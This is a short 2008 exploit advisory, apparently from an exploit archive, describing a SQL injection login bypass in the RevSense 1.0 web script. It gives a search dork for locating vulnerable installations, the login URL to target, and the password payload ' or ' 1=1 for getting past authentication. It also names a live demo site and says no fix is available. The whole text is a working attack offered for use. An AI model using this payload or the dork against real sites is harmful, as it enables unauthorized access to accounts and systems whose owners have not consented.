RevSense (Auth bypass) Remote SQL Injection Vulnerability

2008-11-19 23:20:03

###############################################################################################
[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability
[+] Script home : http://www.revsense.com/
[-] Discovered By : d3b4g
[-] Greetz : str0ke /* All my freind
################################################################################################

Dork:Powered by Revsense

Go to www.target.com/index.php?section=user&action=login

Use following information to bypass login.

Write any email Address as email address.It must to be in email format.

For exapmple [email protected]

For password use ' or ' 1=1

Live demo [at] http://demo.revsense.com/index.php?section=user&action=login
--------------------------------------------
--------------------------------------------
I'm a maldivian
/*

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.